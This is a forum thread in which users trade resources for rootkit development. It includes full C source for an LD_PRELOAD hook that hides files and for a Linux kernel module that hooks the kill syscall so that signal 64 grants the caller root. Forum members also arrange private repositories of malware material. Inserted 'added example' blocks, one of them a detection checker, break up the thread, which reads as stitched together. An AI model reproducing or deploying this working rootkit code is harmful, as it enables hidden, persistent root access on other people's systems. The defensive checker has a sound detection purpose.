[REQUEST] Resources for Rootkit Development?
#1
Recently I've been trying to learn more and more about programming and malware. My end goal currently is to write a rootkit for windows.
So far I have a pretty good grasp on programming (specifically with different low-level languages like C) and x86 assembly (still trying to figure out how to use windows API from ASM). Are there any specific resources anyone wants to share that could possibly help me in this journey? Any tips for learning? I'm open to anything.
Thanks a lot for sharing in advance!
Reply
#2
When I have a little bit more time on my hands I will dig through my mountain of E-books, metaphorically speaking, and get you set up with some I think you may find helpful. I will be quite busy this week, unfortunately.
Reply
#3
(01-20-2021, 07:52 AM)Vector Wrote: When I have a little bit more time on my hands I will dig through my mountain of E-books, metaphorically speaking, and get you set up with some I think you may find helpful. I will be quite busy this week, unfortunately.
Take your time! I appreciate the fact that you're willing to do this later.
Thanks!
Reply
#4
This is a good tutorial that goes really in depth: https://xcellerator.github.io/posts/linux_rootkits_01/. It covers kernel mode rootkits. You might want to start with something in userland like an LD_PRELOAD rootkit. Jynx rootkit is an LD_PRELOAD rootkit you might want to check out. https://github.com/chokepoint/Jynx2
Reply
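For readers who have not seen the technique the post above recommends as a starting point, here is the core of an LD_PRELOAD userland rootkit as an added example. It is written for this thread and is not Jynx's code: the shared object defines its own readdir(3), so every program that lists a directory through libc calls it first, and it drops any entry whose name starts with a prefix. The prefix `.rk_`, the scratch directory under `/tmp` and the helper names are assumptions made for the example.

```c
/*
 * Added example (not Jynx's code): the core trick of an LD_PRELOAD rootkit.
 * The shared object interposes readdir(3); programs that list directories
 * through libc (ls, find, shell tab completion) call ours first, and any
 * entry whose name starts with HIDDEN_PREFIX is dropped.
 *
 * Lab use:  gcc -shared -fPIC -o hide.so hide.c -ldl
 *           touch .rk_payload visible.txt; LD_PRELOAD=./hide.so ls -la
 * The same file also builds as a normal program for the self-test at the end.
 */
#define _GNU_SOURCE                 /* RTLD_NEXT lives behind this in <dlfcn.h> */
#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)    /* glibc's value, if <dlfcn.h> was seen before _GNU_SOURCE */
#endif

#define HIDDEN_PREFIX ".rk_"        /* assumption: anything with this prefix is hidden */

/* The hiding policy, kept separate so it can be tested on its own. */
int should_hide(const char *name)
{
    return strncmp(name, HIDDEN_PREFIX, strlen(HIDDEN_PREFIX)) == 0;
}

/* libc's real readdir. RTLD_NEXT starts the lookup at the object after the
 * caller in the link map, so it skips this file's readdir and finds libc's. */
static struct dirent *(*real_readdir)(DIR *);

struct dirent *readdir(DIR *dirp)
{
    struct dirent *entry;

    if (real_readdir == NULL) {
        *(void **)(&real_readdir) = dlsym(RTLD_NEXT, "readdir");
        if (real_readdir == NULL)
            return NULL;            /* nowhere to forward to: act like end of directory */
    }

    /* Keep pulling from the real readdir until an entry is allowed through. */
    while ((entry = real_readdir(dirp)) != NULL) {
        if (!should_hide(entry->d_name))
            break;
    }
    return entry;
}

/* Self-test: make a scratch directory holding one hidden and one visible file,
 * list it through the hooked readdir and return how many entries came back.
 * A working hook returns 3 (".", ".." and visible.txt); -1 on setup error,
 * -2 if a hidden name leaked through. */
int count_visible_after_setup(void)
{
    char dir[] = "/tmp/rkdemoXXXXXX";
    char hidden[64], visible[64];
    FILE *f;
    DIR *d;
    struct dirent *e;
    int n = 0, leaked = 0;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(hidden, sizeof hidden, "%s/" HIDDEN_PREFIX "payload", dir);
    snprintf(visible, sizeof visible, "%s/visible.txt", dir);
    if ((f = fopen(hidden, "w")) == NULL || fclose(f) != 0)
        return -1;
    if ((f = fopen(visible, "w")) == NULL || fclose(f) != 0)
        return -1;

    if ((d = opendir(dir)) != NULL) {
        while ((e = readdir(d)) != NULL) {   /* resolves to the hook above */
            if (should_hide(e->d_name))
                leaked = 1;
            n++;
        }
        closedir(d);
    } else {
        n = -1;
    }
    unlink(hidden);
    unlink(visible);
    rmdir(dir);
    return leaked ? -2 : n;
}
```

Two caveats a practitioner will want. First, a real kit hooks more than `readdir`: on glibc the `readdir64` variant, plus `stat`, `open`, `fopen` and friends, otherwise a hidden file is still reachable by name. Second, the interposition only affects dynamically linked programs that go through libc, which is also how you detect it: a statically linked `ls`, a tool that calls `getdents64` directly, or a simple diff between a normal listing and one run with `LD_PRELOAD` unset will show the missing entries, and `/etc/ld.so.preload` is the first place to look for a system-wide preload.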
#5
(01-20-2021, 05:59 PM)DeepLogic Wrote: This is a good tutorial that goes really in depth: https://xcellerator.github.io/posts/linux_rootkits_01/. It covers kernel mode rootkits. You might want to start with something in userland like an LD_PRELOAD rootkit. Jynx rootkit is an LD_PRELOAD rootkit you might want to check out. https://github.com/chokepoint/Jynx2
All looks good! Thanks a lot!
Reply
#6
I would encourage anyone that wants to learn MalDev to learn about Linux and Windows techniques. Glad to see DeepLogic linked you some Linux related stuff. `LD_PRELOAD` isn't a thing on Windows though.

That said, I've opened a secure repository for you, UEAX. While I work I'll sync some of the resources I promised you there. I will send you a PM with the link once everything is ready.
Reply
#7
Glad to hear everyone here is encouraging! And thanks a lot for that, Vector. I've taken a look at some of your provided resources, DeepLogic, and I've been writing some really cool LKMs for Linux. Really interesting stuff!
Thanks a lot everyone.
Reply
#8
(01-21-2021, 03:50 AM)ueax Wrote: Glad to hear everyone here is encouraging! And thanks a lot for that, Vector. I've taken a look at some of your provided resources, DeepLogic, and I've been writing some really cool LKMs for Linux. Really interesting stuff!
Thanks a lot everyone.

It'd be cool if we could check out some of the LKMs, and your work more generally.
Reply
#9
(01-21-2021, 04:11 AM)Vector Wrote:
(01-21-2021, 03:50 AM)ueax Wrote: Glad to hear everyone here is encouraging! And thanks a lot for that, Vector. I've taken a look at some of your provided resources, DeepLogic, and I've been writing some really cool LKMs for Linux. Really interesting stuff!
Thanks a lot everyone.

It'd be cool if we could check out some of the LKMs, and your work more generally.

Sure! I followed the resource in DeepLogic's post, which has a walkthrough on how to write an LKM for Linux in C.
After going through a few sections, I made an LKM such that, if a user has permission to use 'insmod', they can insert the LKM below,
and then if a user runs 'kill -64 123' (123 being any number) they escalate to root.

I'm relatively new to this kind of thing so go easy on me lol.

ftrace_helper.h can be found here: https://github.com/xcellerator/linux_ker...e_helper.h
ftrace_helper.h basically gives some higher level functions that can be used to hook existing syscalls.

Code:
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/kallsyms.h>
#include <linux/version.h>
#include <linux/cred.h>      /* prepare_creds() / commit_creds() */

#include "ftrace_helper.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("ueax");
MODULE_DESCRIPTION("syskill esc");
MODULE_VERSION("0.3");

/*
 * Since 4.17 the x86_64 syscall entry points take a single struct pt_regs *
 * instead of the individual arguments, so the hook signature has to match.
 * ftrace_helper.h defines the same macro; repeating it here is harmless.
 */
#if defined(CONFIG_X86_64) && (LINUX_VERSION_CODE >= KERNEL_VERSION(4,17,0))
#define PTREGS_SYSCALL_STUBS 1
#endif

static void set_root(void);

#ifdef PTREGS_SYSCALL_STUBS
static asmlinkage long (*orig_kill)(const struct pt_regs *);

/* kill(pid, sig): with pt_regs stubs, pid is in regs->di and sig in regs->si.
 * The return type is long so it matches what the syscall dispatcher expects. */
static asmlinkage long hook_kill(const struct pt_regs *regs)
{
    int sig = regs->si;

    if (sig == 64) {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;            /* the signal is swallowed; the caller sees success */
    }
    return orig_kill(regs);
}

#else
static asmlinkage long (*orig_kill)(pid_t pid, int sig);

static asmlinkage long hook_kill(pid_t pid, int sig)
{
    if (sig == 64) {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;
    }
    return orig_kill(pid, sig);
}
#endif

/* Replace the calling task's credentials with a fresh set where every
 * uid/gid (real, effective, saved and filesystem) is 0. */
static void set_root(void)
{
    struct cred *root;

    root = prepare_creds();
    if (root == NULL)
        return;

    root->uid.val = root->gid.val = 0;
    root->euid.val = root->egid.val = 0;
    root->suid.val = root->sgid.val = 0;
    root->fsuid.val = root->fsgid.val = 0;

    commit_creds(root);
}

/*
 * The HOOK() macro in ftrace_helper.h adds the "__x64_" prefix on pt_regs
 * kernels and resolves the symbol with kallsyms_lookup_name(). That symbol is
 * no longer exported to modules since 5.7, so on newer kernels the copy of
 * the helper you use has to look it up another way (e.g. via a kprobe) or
 * fh_install_hooks() fails.
 */
static struct ftrace_hook hooks[] = {
    HOOK("sys_kill", hook_kill, &orig_kill),
};

static int __init rootkit_init(void)
{
    int err;

    err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
    if (err)
        return err;
    printk(KERN_INFO "RootKit: Loaded.\n");
    return 0;
}

static void __exit rootkit_exit(void)
{
    fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
    printk(KERN_INFO "RootKit: Unloaded\n");
}

module_init(rootkit_init);
module_exit(rootkit_exit);

I've also done a little bit of other malware developing in the past, but it isn't as interesting as this.
Reply
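The flip side of the module in the post above is how a defender spots it. Every hook that `fh_install_hooks()` registers attaches an ftrace callback to the target function, and the kernel lists every function with a callback attached in tracefs as `enabled_functions`, one per line, beginning with the function name and the number of attached callbacks in parentheses. The following checker is an added example written for this thread; it is not part of the module or of ftrace_helper.h. The sample lines embedded in it are constructed for the example (the trampoline address and the text after the count are made up and vary between kernel versions), and only the leading "name (count)" part is relied on.

```c
/*
 * Added example (not from the post above or ftrace_helper.h): list the
 * functions that currently have ftrace callbacks attached and flag syscall
 * entry points. On a box that is not being traced the file is normally empty,
 * so a "__x64_sys_kill (1)" line is exactly the footprint the module leaves.
 *
 * Lab use (as root):  gcc -O2 -o ftrace_check ftrace_check.c && ./ftrace_check
 * If the path is missing:  mount -t tracefs nodev /sys/kernel/tracing
 */
#include <stdio.h>
#include <string.h>

struct ftrace_entry {
    char name[128];   /* hooked kernel function, e.g. __x64_sys_kill */
    long count;       /* number of ftrace callbacks attached to it */
    int  is_syscall;  /* 1 if the name looks like a syscall entry point */
};

/* Parse one enabled_functions line. The flags and trampoline text after the
 * count vary between kernel versions and are ignored. Returns 1 on success,
 * 0 for blank or unrecognised lines. */
int parse_enabled_functions_line(const char *line, struct ftrace_entry *out)
{
    if (sscanf(line, "%127s (%ld)", out->name, &out->count) != 2)
        return 0;
    out->is_syscall = strstr(out->name, "sys_") != NULL;
    return 1;
}

/* Parse a buffer of newline-separated lines into out[]; returns entries found. */
int scan_enabled_functions_text(const char *text, struct ftrace_entry *out, int max)
{
    const char *p = text;
    int n = 0;

    while (*p != '\0' && n < max) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];

        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (parse_enabled_functions_line(line, &out[n]))
            n++;
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return n;
}

int count_syscall_hooks(const struct ftrace_entry *e, int n)
{
    int i, hooked = 0;

    for (i = 0; i < n; i++)
        hooked += e[i].is_syscall;
    return hooked;
}

/* Read the live file. Returns entries found, or -1 if tracefs is not mounted
 * or not readable (this needs root). */
int scan_live_system(struct ftrace_entry *out, int max)
{
    static const char *const paths[] = {
        "/sys/kernel/tracing/enabled_functions",
        "/sys/kernel/debug/tracing/enabled_functions",
    };
    char line[256];
    FILE *f = NULL;
    int i, n = 0;

    for (i = 0; i < 2 && f == NULL; i++)
        f = fopen(paths[i], "r");
    if (f == NULL)
        return -1;
    while (n < max && fgets(line, sizeof line, f) != NULL)
        if (parse_enabled_functions_line(line, &out[n]))
            n++;
    fclose(f);
    return n;
}

/* Constructed sample, modelled on the "name (count)" prefix the kernel prints;
 * the trampoline address and thunk name are made up for this example. */
const char SAMPLE_ENABLED_FUNCTIONS[] =
    "__x64_sys_kill (1) R I  tramp: 0xffffffffc0a3c000 (fh_ftrace_thunk+0x0/0x60) ->ftrace_ops_assist_func\n"
    "schedule (1) R I        ->ftrace_ops_assist_func\n"
    "\n"
    "__x64_sys_mkdir (1) R I tramp: 0xffffffffc0a3c100 (fh_ftrace_thunk+0x0/0x60) ->ftrace_ops_assist_func\n";

int main(void)
{
    struct ftrace_entry e[64];
    int i, n = scan_live_system(e, 64);

    if (n < 0) {
        fputs("enabled_functions not readable; showing the constructed sample\n", stderr);
        n = scan_enabled_functions_text(SAMPLE_ENABLED_FUNCTIONS, e, 64);
    }
    for (i = 0; i < n; i++)
        printf("%s%s: %ld callback(s)\n", e[i].is_syscall ? "[SYSCALL HOOK] " : "",
               e[i].name, e[i].count);
    return count_syscall_hooks(e, n) > 0;
}
```

The check is only as good as the kernel's own bookkeeping: a module that also hooks the tracefs read path, or that tampers with the ftrace records, can hide from it, and legitimate tracing (perf, bpftrace, live patching) puts entries in the same file. Treat a hit as a lead to confirm with `lsmod`, `dmesg` and a look at the module's text, not as proof on its own.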
#10
(01-21-2021, 05:08 AM)ueax Wrote: Sure! I followed the resource in DeepLogic's post, which has a walkthrough on how to write an LKM for Linux in C.
After going through a few sections, I made an LKM such that, if a user has permission to use 'insmod', they can insert the LKM below,
and then if a user runs 'kill -64 123' (123 being any number) they escalate to root.

I'm relatively new to this kind of thing so go easy on me lol.

ftrace_helper.h can be found here: https://github.com/xcellerator/linux_ker...e_helper.h
ftrace_helper.h basically gives some higher level functions that can be used to hook existing syscalls.

I've also done a little bit of other malware developing in the past, but it isn't as interesting as this.

Not bad at all. How are you planning to load the kernel modules? Also, it's good to know you have some experience with MalDev; I have adjusted the Data Stream to your Secure Repo accordingly. It will be ready in 30 minutes. I have also added you on XMPP.

I have sent you a PM with the pertinent information related to your Secure Repo.
Reply

